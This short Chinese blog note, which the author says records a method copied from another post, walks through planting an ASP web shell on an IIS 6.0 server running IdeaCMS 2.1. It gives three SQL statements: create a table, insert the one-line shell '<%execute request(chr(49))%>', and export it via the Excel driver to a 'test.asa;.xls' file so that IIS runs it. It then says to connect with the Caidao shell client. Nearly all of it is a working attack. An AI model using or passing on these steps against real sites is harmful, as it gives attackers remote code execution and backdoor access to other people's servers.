随笔目的:只是为了自己,记录一下这个方法(非原创)而已。
测试系统:win2003+iis6.0+IdeaCMS 2.1
目标网站IP,物理路径如下图:
利用页面如下:
在输入框中依次输入下列三条语句即可:
1. create table test(a varchar(50))#建立一个表test,其中含一个可变字段a
2. insert into test(a) values (‘<%execute request(chr(49))%>‘)#向表test中插入一条记录,值是一句话木马
3. select * into [a] in ‘C:\WWW\test.asa;.xls‘ ‘excel 4.0;‘ from test;#表复制语句
#语句形式为:SELECT vale1, value2 into Table2 from Table1
#要求目标表Table2不存在,因为在插入时会自动创建表Table2,并将Table1中指定字段数据复制到Table2中。
执行无误后,用菜刀连接即可。
原文:http://www.cnblogs.com/Kerne0/p/5173802.html